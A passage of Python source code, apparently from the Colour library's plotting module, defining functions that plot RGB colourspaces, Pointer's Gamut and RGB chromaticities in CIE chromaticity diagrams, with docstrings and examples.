"plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS",
"plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS",
"ellipses_MacAdam1942",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS",
"plot_single_cctf",
"plot_multi_cctfs",
"plot_constant_hue_loci",
]
COLOURSPACE_MODELS_AXIS_ORDER: CanonicalMapping = CanonicalMapping(
{
"CAM02LCD": (1, 2, 0),
"CAM02SCD": (1, 2, 0),
"CAM02UCS": (1, 2, 0),
"CAM16LCD": (1, 2, 0),
"CAM16SCD": (1, 2, 0),
"CAM16UCS": (1, 2, 0),
"CIE XYZ": (0, 1, 2),
"CIE xyY": (0, 1, 2),
"CIE Lab": (1, 2, 0),
"CIE LCHab": (1, 2, 0),
"CIE Luv": (1, 2, 0),
"CIE LCHuv": (1, 2, 0),
"CIE UCS": (0, 1, 2),
"CIE UVW": (1, 2, 0),
"DIN99": (1, 2, 0),
"Hunter Lab": (1, 2, 0),
"Hunter Rdab": (1, 2, 0),
"ICaCb": (1, 2, 0),
"ICtCp": (1, 2, 0),
"IPT": (1, 2, 0),
"IPT Ragoo 2021": (1, 2, 0),
"IgPgTg": (1, 2, 0),
"Jzazbz": (1, 2, 0),
"OSA UCS": (1, 2, 0),
"Oklab": (1, 2, 0),
"hdr-CIELAB": (1, 2, 0),
"hdr-IPT": (1, 2, 0),
"Yrg": (1, 2, 0),
}
)
"""Colourspace models axis order."""
def colourspace_model_axis_reorder(
a: ArrayLike,
model: Literal[
"CAM02LCD",
"CAM02SCD",
"CAM02UCS",
"CAM16LCD",
"CAM16SCD",
"CAM16UCS",
"CIE XYZ",
"CIE xyY",
"CIE Lab",
"CIE LCHab",
"CIE Luv",
"CIE LCHuv",
"CIE UCS",
"CIE UVW",
"DIN99",
"Hunter Lab",
"Hunter Rdab",
"ICaCb",
"ICtCp",
"IPT",
"IPT Ragoo 2021",
"IgPgTg",
"Jzazbz",
"OSA UCS",
"Oklab",
"hdr-CIELAB",
"hdr-IPT",
"Yrg",
]
| str,
direction: Literal["Forward", "Inverse"] | str = "Forward",
) -> NDArrayFloat:
"""
Reorder the axes of given colourspace model :math:`a` array according to
the most common volume plotting axes order.
Parameters
----------
a
Colourspace model :math:`a` array.
model
Colourspace model, see :attr:`colour.COLOURSPACE_MODELS` attribute for
the list of supported colourspace models.
direction
Reordering direction.
Returns
-------
:class:`numpy.ndarray`
Reordered colourspace model :math:`a` array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> colourspace_model_axis_reorder(a, "CIE Lab")
array([ 1., 2., 0.])
>>> colourspace_model_axis_reorder(a, "IPT")
array([ 1., 2., 0.])
>>> colourspace_model_axis_reorder(a, "OSA UCS")
array([ 1., 2., 0.])
>>> b = np.array([1, 2, 0])
>>> colourspace_model_axis_reorder(b, "OSA UCS", "Inverse")
array([ 0., 1., 2.])
"""
a = as_float_array(a)
model = validate_method(
model,
tuple(COLOURSPACE_MODELS_AXIS_ORDER),
'"{0}" model is invalid, it must be one of {1}!',
)
direction = validate_method(
direction,
("Forward", "Inverse"),
'"{0}" direction is invalid, it must be one of {1}!',
)
order = COLOURSPACE_MODELS_AXIS_ORDER.get(model, (0, 1, 2))
if direction == "forward":
indexes = (order[0], order[1], order[2])
else:
indexes = (order.index(0), order.index(1), order.index(2))
return a[..., indexes]
@override_style()
def plot_pointer_gamut(
pointer_gamut_colours: ArrayLike | str | None = None,
pointer_gamut_opacity: float = 1,
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *Pointer's Gamut* according to given method.
Parameters
----------
pointer_gamut_colours
Colours of the *Pointer's Gamut*.
pointer_gamut_opacity
Opacity of the *Pointer's Gamut*.
method
Plotting method.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`, :func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_pointer_gamut() # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Pointer_Gamut.png
:align: center
:alt: plot_pointer_gamut
"""
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
pointer_gamut_colours = optional(
pointer_gamut_colours, CONSTANTS_COLOUR_STYLE.colour.dark
)
pointer_gamut_opacity = optional(
pointer_gamut_opacity, CONSTANTS_COLOUR_STYLE.opacity.high
)
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
if method == "cie 1931":
def XYZ_to_ij(
XYZ: NDArrayFloat, *args: Any # noqa: ARG001
) -> NDArrayFloat:
"""
Convert given *CIE XYZ* tristimulus values to *ij* chromaticity
coordinates.
"""
return XYZ_to_xy(XYZ)
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy
elif method == "cie 1960 ucs":
def XYZ_to_ij(
XYZ: NDArrayFloat, *args: Any # noqa: ARG001
) -> NDArrayFloat:
"""
Convert given *CIE XYZ* tristimulus values to *ij* chromaticity
coordinates.
"""
return UCS_to_uv(XYZ_to_UCS(XYZ))
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_UCS_uv(xy)
elif method == "cie 1976 ucs":
def XYZ_to_ij(XYZ: NDArrayFloat, *args: Any) -> NDArrayFloat:
"""
Convert given *CIE XYZ* tristimulus values to *ij* chromaticity
coordinates.
"""
return Luv_to_uv(XYZ_to_Luv(XYZ, *args), *args)
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_Luv_uv(xy)
ij = xy_to_ij(CCS_POINTER_GAMUT_BOUNDARY)
axes.plot(
ij[..., 0],
ij[..., 1],
label="Pointer's Gamut",
color=pointer_gamut_colours,
alpha=pointer_gamut_opacity,
zorder=CONSTANTS_COLOUR_STYLE.zorder.foreground_line,
)
axes.plot(
(ij[-1][0], ij[0][0]),
(ij[-1][1], ij[0][1]),
color=pointer_gamut_colours,
alpha=pointer_gamut_opacity,
zorder=CONSTANTS_COLOUR_STYLE.zorder.foreground_line,
)
XYZ = Lab_to_XYZ(
LCHab_to_Lab(DATA_POINTER_GAMUT_VOLUME), CCS_ILLUMINANT_POINTER_GAMUT
)
ij = XYZ_to_ij(XYZ, CCS_ILLUMINANT_POINTER_GAMUT)
scatter_settings = {
"alpha": pointer_gamut_opacity / 2,
"color": pointer_gamut_colours,
"marker": "+",
"zorder": CONSTANTS_COLOUR_STYLE.zorder.foreground_scatter,
}
axes.scatter(ij[..., 0], ij[..., 1], **scatter_settings)
settings.update({"axes": axes})
settings.update(kwargs)
return render(**settings)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable: Callable = plot_chromaticity_diagram,
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *Chromaticity Diagram* according
to given method.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable
Callable responsible for drawing the *Chromaticity Diagram*.
method
*Chromaticity Diagram* method.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_kwargs = [
... {"color": "r"},
... {"linestyle": "dashed"},
... {"marker": None},
... ]
>>> plot_RGB_colourspaces_in_chromaticity_diagram(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"], plot_kwargs=plot_kwargs
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram
"""
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
colourspaces = cast(
List[RGB_Colourspace],
list(filter_RGB_colourspaces(colourspaces).values()),
) # pyright: ignore
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
cmfs = cast(
MultiSpectralDistributions, first_item(filter_cmfs(cmfs).values())
)
title = (
f"{', '.join([colourspace.name for colourspace in colourspaces])}\n"
f"{cmfs.name} - {method.upper()} Chromaticity Diagram"
)
settings = {"axes": axes, "title": title, "method": method}
settings.update(kwargs)
settings["show"] = False
chromaticity_diagram_callable(**settings)
if show_pointer_gamut:
settings = {"axes": axes, "method": method}
settings.update(kwargs)
settings["show"] = False
plot_pointer_gamut(**settings)
if method == "cie 1931":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy
x_limit_min, x_limit_max = [-0.1], [0.9]
y_limit_min, y_limit_max = [-0.1], [0.9]
elif method == "cie 1960 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_UCS_uv(xy)
x_limit_min, x_limit_max = [-0.1], [0.7]
y_limit_min, y_limit_max = [-0.2], [0.6]
elif method == "cie 1976 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_Luv_uv(xy)
x_limit_min, x_limit_max = [-0.1], [0.7]
y_limit_min, y_limit_max = [-0.1], [0.7]
settings = {"colour_cycle_count": len(colourspaces)}
settings.update(kwargs)
cycle = colour_cycle(**settings)
plotting_colourspace = CONSTANTS_COLOUR_STYLE.colour.colourspace
plot_settings_collection = [
{
"label": f"{colourspace.name}",
"marker": "o",
"color": next(cycle)[:3],
"zorder": CONSTANTS_COLOUR_STYLE.zorder.foreground_line,
}
for colourspace in colourspaces
]
if plot_kwargs is not None:
update_settings_collection(
plot_settings_collection, plot_kwargs, len(colourspaces)
)
for i, colourspace in enumerate(colourspaces):
plot_settings = plot_settings_collection[i]
if chromatically_adapt and not np.array_equal(
colourspace.whitepoint, plotting_colourspace.whitepoint
):
colourspace = colourspace.chromatically_adapt( # noqa: PLW2901
plotting_colourspace.whitepoint,
plotting_colourspace.whitepoint_name,
)
        # RGB colourspaces such as *ACES2065-1* have primaries with
        # chromaticity coordinates set to 0, thus we prevent NaNs from being
        # yielded by zero division in later colour transformations.
P = np.where(
colourspace.primaries == 0,
EPSILON,
colourspace.primaries,
)
P = xy_to_ij(P)
W = xy_to_ij(colourspace.whitepoint)
P_p = np.vstack([P, P[0]])
axes.plot(P_p[..., 0], P_p[..., 1], **plot_settings)
if show_whitepoints:
plot_settings["marker"] = "o"
plot_settings.pop("label")
W_p = np.vstack([W, W])
axes.plot(W_p[..., 0], W_p[..., 1], **plot_settings)
x_limit_min.append(cast(float, np.amin(P[..., 0]) - 0.1))
y_limit_min.append(cast(float, np.amin(P[..., 1]) - 0.1))
x_limit_max.append(cast(float, np.amax(P[..., 0]) + 0.1))
y_limit_max.append(cast(float, np.amax(P[..., 1]) + 0.1))
bounding_box = (
min(x_limit_min),
max(x_limit_max),
min(y_limit_min),
max(y_limit_max),
)
settings.update(
{
"show": True,
"legend": True,
"bounding_box": bounding_box,
}
)
settings.update(kwargs)
return render(**settings)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable_CIE1931: Callable = (
plot_chromaticity_diagram_CIE1931
),
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *CIE 1931 Chromaticity Diagram*.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable_CIE1931
Callable responsible for drawing the *CIE 1931 Chromaticity Diagram*.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"]
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram_CIE1931.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1931"})
return plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces,
cmfs,
chromaticity_diagram_callable_CIE1931,
show_whitepoints=show_whitepoints,
show_pointer_gamut=show_pointer_gamut,
chromatically_adapt=chromatically_adapt,
plot_kwargs=plot_kwargs,
**settings,
)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable_CIE1960UCS: Callable = (
plot_chromaticity_diagram_CIE1960UCS
),
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *CIE 1960 UCS Chromaticity Diagram*.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable_CIE1960UCS
Callable responsible for drawing the
*CIE 1960 UCS Chromaticity Diagram*.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"]
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram_CIE1960UCS.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1960 UCS"})
return plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces,
cmfs,
chromaticity_diagram_callable_CIE1960UCS,
show_whitepoints=show_whitepoints,
show_pointer_gamut=show_pointer_gamut,
chromatically_adapt=chromatically_adapt,
plot_kwargs=plot_kwargs,
**settings,
)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable_CIE1976UCS: Callable = (
plot_chromaticity_diagram_CIE1976UCS
),
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *CIE 1976 UCS Chromaticity Diagram*.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable_CIE1976UCS
Callable responsible for drawing the
*CIE 1976 UCS Chromaticity Diagram*.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"]
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram_CIE1976UCS.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1976 UCS"})
return plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces,
cmfs,
chromaticity_diagram_callable_CIE1976UCS,
show_whitepoints=show_whitepoints,
show_pointer_gamut=show_pointer_gamut,
chromatically_adapt=chromatically_adapt,
plot_kwargs=plot_kwargs,
**settings,
)
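# Hedged usage sketch (not part of the original module): illustrates the
# CIE 1976 UCS wrapper above with per-colourspace "plot_kwargs"; the colourspace
# names are standard Colour identifiers, the styling values are illustrative.
def _example_plot_colourspaces_CIE1976UCS() -> None:  # pragma: no cover
    plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS(
        ["ITU-R BT.709", "ACEScg"],
        show_whitepoints=True,
        plot_kwargs=[
            {"color": "b", "linestyle": "--"},  # style for "ITU-R BT.709"
            {"color": "g"},  # style for "ACEScg"
        ],
    )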
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram
),
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the *Chromaticity Diagram* according
to given method.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable
Callable responsible for drawing the *Chromaticity Diagram*.
method
*Chromaticity Diagram* method.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram(RGB, "ITU-R BT.709")
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram
"""
RGB = np.reshape(as_float_array(RGB), (-1, 3))
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
scatter_settings = {
"s": 40,
"c": "RGB",
"marker": "o",
"alpha": 0.85,
"zorder": CONSTANTS_COLOUR_STYLE.zorder.midground_scatter,
"apply_cctf_encoding": True,
}
if scatter_kwargs is not None:
scatter_settings.update(scatter_kwargs)
settings = dict(kwargs)
settings.update({"axes": axes, "show": False})
colourspace = cast(
RGB_Colourspace,
first_item(filter_RGB_colourspaces(colourspace).values()),
)
settings["colourspaces"] = [colourspace, *settings.get("colourspaces", [])]
chromaticity_diagram_callable(**settings)
use_RGB_colours = str(scatter_settings["c"]).upper() == "RGB"
apply_cctf_encoding = scatter_settings.pop("apply_cctf_encoding")
if use_RGB_colours:
RGB = RGB[RGB[:, 1].argsort()]
scatter_settings["c"] = np.clip(
np.reshape(
RGB_to_RGB(
RGB,
colourspace,
CONSTANTS_COLOUR_STYLE.colour.colourspace,
apply_cctf_encoding=apply_cctf_encoding,
),
(-1, 3),
),
0,
1,
)
XYZ = RGB_to_XYZ(RGB, colourspace)
if method == "cie 1931":
ij = XYZ_to_xy(XYZ)
elif method == "cie 1960 ucs":
ij = UCS_to_uv(XYZ_to_UCS(XYZ))
elif method == "cie 1976 ucs":
ij = Luv_to_uv(
XYZ_to_Luv(XYZ, colourspace.whitepoint), colourspace.whitepoint
)
axes.scatter(ij[..., 0], ij[..., 1], **scatter_settings)
settings.update({"show": True})
settings.update(kwargs)
return render(**settings)
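# Hedged usage sketch (not part of the original module): shows how
# "scatter_kwargs" restyles the scatter; the diagram-specific wrappers below
# select the method together with the matching diagram callable. The array
# shape and keyword values are illustrative assumptions.
def _example_plot_RGB_chromaticities() -> None:  # pragma: no cover
    RGB = np.random.random((64, 64, 3))
    plot_RGB_chromaticities_in_chromaticity_diagram(
        RGB,
        "ITU-R BT.709",
        scatter_kwargs={"s": 10, "alpha": 0.5, "c": "RGB"},
    )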
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable_CIE1931: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931
),
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the *CIE 1931 Chromaticity Diagram*.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable_CIE1931
Callable responsible for drawing the *CIE 1931 Chromaticity Diagram*.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931(
... RGB, "ITU-R BT.709"
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram_CIE1931.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1931"})
return plot_RGB_chromaticities_in_chromaticity_diagram(
RGB,
colourspace,
chromaticity_diagram_callable_CIE1931,
scatter_kwargs=scatter_kwargs,
**settings,
)
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable_CIE1960UCS: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS
),
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the
*CIE 1960 UCS Chromaticity Diagram*.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable_CIE1960UCS
Callable responsible for drawing the
*CIE 1960 UCS Chromaticity Diagram*.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
